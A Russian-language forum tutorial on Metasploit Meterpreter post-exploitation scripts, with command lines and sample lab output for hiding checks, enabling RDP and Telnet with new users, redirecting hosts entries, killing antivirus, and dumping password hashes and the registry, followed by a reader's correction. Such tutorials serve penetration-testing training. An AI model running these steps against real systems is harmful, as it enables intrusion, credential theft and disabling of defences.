Статья Основы работы в meterpreter (Metasploit Часть1)

«Чтобы двигаться в будущее нужно вернуться в прошлое»
31982.jpg

В этой статье мы вновь вернемся назад и узнаем об основах работы в meterpreter, ибо очень много информации есть как получить сессию, а вот что дальше делать с этим инфы мало)

Вот сейчас мы пройдемся с начала по Скриптам а потом и до Команд дойдем.

С приблизительной русификацией (то что смог)

Metasploit
Metasploit поставляется с тоннами полезных скриптов и команд, которые могут помочь вам в исследованиях. Скрипты, как правило, сделаны третьими сторонами и в конечном итоге принимаются в хранилище Subversion. Мы будем рассматривать некоторые из них и описывать их назначения.
Скрипты и команды, указанные ниже, предназначены для использования с оболочкой Meterpreter после успешного получения сессии. После того, как вы получили сессию вы можете использовать эти скрипты и команды, чтобы наилучшим образом действовать в системе.

Скрипты

1) checkvm
Скрипт под названием “checkvm” которое говорит само за себя предназначен для проверки наличия у цели виртуальных машин
DoberGroup сказал(а):
не находится ли цель внутри виртуальной машины
Код:
 meterpreter > run checkvm
 
 [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
 [*] This is a VMware Workstation/Fusion Virtual Machine

2) getcountermeasure

Скрипт ‘getcountermeasure’ проверяет установки безопасности на целевой системе и может отрубить (мало вероятно)
Код:
  meterpreter > run getcountermeasure
 
 [*] Running Getcountermeasure on the target...
 [*] Checking for contermeasures...
 [*] Getting Windows Built in Firewall configuration...
 [*]
 [*]     Domain profile configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]     Exception mode                    = Enable
 [*]
 [*]     Standard profile configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]     Exception mode                    = Enable
 [*]
 [*]     Local Area Connection 6 firewall configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]
 [*] Checking DEP Support Policy...

3) Getgui

‘getgui’ скрипт используется, чтобы включить RDP на целевой системе, если она отключена.
Код:
 meterpreter > run getgui
 
 Windows Remote Desktop Enabler Meterpreter Script
 Usage: getgui -u  -p

 
 OPTIONS:
 
 -e   Enable RDP only.
 -h   Help menu.
 -p   The Password of the user to add.
 -u   The Username of the user to add.
 
 meterpreter > run getgui -e
 
 [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
 [*] Carlos Perez carlos_perez@darkoperator.com
 [*] Enabling Remote Desktop
 [*] RDP is already enabled
 [*] Setting Terminal Services service startup mode
 [*] Terminal Services service is already set to auto
 [*] Opening port in local firewall if necessary

4) get_local_subnets

‘get_local_subnets’ скрипт используется, чтобы получить локальную маску подсети жертвы. Это может оказаться очень полезной информацией, чтобы иметь информацию для действий.
Код:
 meterpreter > run get_local_subnets


 Local subnet: 10.211.55.0/255.255.255.0

5) gettelnet

‘gettelnet’ скрипт используется, чтобы запустить TELNET на целевой машине, если это там отключено.
Код:
 meterpreter > run gettelnet


 Windows Telnet Server Enabler Meterpreter Script

 Usage: gettelnet -u  -p



 OPTIONS:


 -e   Enable Telnet Server only.

 -h   Help menu.

 -p   The Password of the user to add.

 -u   The Username of the user to add.


 meterpreter > run gettelnet -e


 [*] Windows Telnet Server Enabler Meterpreter Script

 [*] Setting Telnet Server Services service startup mode

 [*] The Telnet Server Services service is not set to auto, changing it to auto ...

 [*] Opening port in local firewall if necessary

6) hostsedit

‘hostsedit’ скрипт Meterpreter для добавления записей в файл hosts Windows.
Код:
meterpreter > run hostsedit

 

 OPTIONS:


 -e   Host entry in the format of IP,Hostname.

 -h   Help Options.

 -l   Text file with list of entries in the format of IP,Hostname. One per line.


 Example:


 run hostsedit -e 127.0.0.1,google.com

 run hostsedit -l /tmp/fakednsentries.txt


 meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com

 [*] Making Backup of the hosts file.

 [*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back

 [*] Adding Record for Host www.microsoft.com with IP 10.211.55.162

 [*] Clearing the DNS Cache

7) killav

‘killav’ скрипт может использоваться, чтобы отключить большинство антивирусных программ (Мало вероятно).
Код:
 meterpreter > run killav


 [*] Killing Antivirus services on the target...

 [*] Killing off cmd.exe...

8) remotewinenum

‘remotewinenum’ скрипт перечислит информацию о системе через wmic на жертве
Я могу предположить, что

Код:
-u administrator -p ihazpassword -t 10.211.55.128

-u administrator Имя пользователя

-p ihazpassword Пароль пользователя

-t 10.211.55.128. Адресс в сети

Код:
meterpreter > run remotewinenum


 Remote Windows Enumeration Meterpreter Script

 This script will enumerate windows hosts in the target environment

 given a username and password or using the credential under witch

 Meterpreter is running using WMI wmic windows native tool.

 Usage:


 OPTIONS:


 -h   Help menu.

 -p   Password of user on target system

 -t   The target address

 -u   User on the target system (If not provided it will use credential of process)


 meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128


 [*] Saving report to /root/.msf4/logs/remotewinenum/10.211.55.128_20090711.0142

 [*] Running WMIC Commands ....

 [*]     running command wimic environment list

 [*]     running command wimic share list

 [*]     running command wimic nicconfig list

 [*]     running command wimic computersystem list

 [*]     running command wimic useraccount list

 [*]     running command wimic group list

 [*]     running command wimic sysaccount list

 [*]     running command wimic volume list brief

 [*]     running command wimic logicaldisk get description,filesystem,name,size

 [*]     running command wimic netlogin get name,lastlogon,badpasswordcount

 [*]     running command wimic netclient list brief

 [*]     running command wimic netuse get name,username,connectiontype,localname

 [*]     running command wimic share get name,path

 [*]     running command wimic nteventlog get path,filename,writeable

 [*]     running command wimic service list brief

 [*]     running command wimic process list brief

 [*]     running command wimic startup list full

 [*]     running command wimic rdtoggle list

 [*]     running command wimic product get name,version

 [*]     running command wimic qfe list

9) scraper

Скрипт ‘scraper’ (что кстати можно перевести как 'скребка') логично что может захватить еще больше информации о системе, включая всю регистрацию.
Код:
meterpreter > run scraper

 

 [*] New session on 10.211.55.128:4444...

 [*] Gathering basic system information...

 [*] Dumping password hashes...

 [*] Obtaining the entire registry...

 [*] Exporting HKCU

 [*] Downloading HKCU (C:\WINDOWS\TEMP\LQTEhIqo.reg)

 [*] Cleaning HKCU

 [*] Exporting HKLM

 [*] Downloading HKLM (C:\WINDOWS\TEMP\GHMUdVWt.reg)

10) winenum

Благодаря скрипту‘winenum’ Мы получаем хэш паролей, настройки системы, список пользователей и многое другое.

Код:
meterpreter > run winenum


 [*] Running Windows Local Enumerion Meterpreter Script

 [*] New session on 10.211.55.128:4444...

 [*] Saving report to /root/.msf4/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt

 [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........

 [*]     This is a VMware Workstation/Fusion Virtual Machine

 [*] Running Command List ...

 [*]     running command cmd.exe /c set

 [*]     running command arp -a

 [*]     running command ipconfig /all

 [*]     running command ipconfig /displaydns

 [*]     running command route print

 [*]     running command net view

 [*]     running command netstat -nao

 [*] Extracting software list from registry

 [*] Finished Extraction of software list from registry

 [*] Dumping password hashes...

 [*] Hashes Dumped

 [*] Getting Tokens...

 [*] All tokens have been processed

 [*] Done!

Ссылка на источник ::

Вот и все на сегодня народ скоро будет часть где я переведу все что показывает команда help и по ближе познакомимся с самыми интересными (На мой взгляд командами)

sm_2664366_07_201510201040285441.jpg
 
Последнее редактирование:
D

DoberGroup

предназначен для определение наличия у цели виртуальных машин.
Он предназначен для проверки, не находится ли цель внутри виртуальной машины.

Пункты 9 и 10 поправьте, копи-паст Вас подвел немного
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!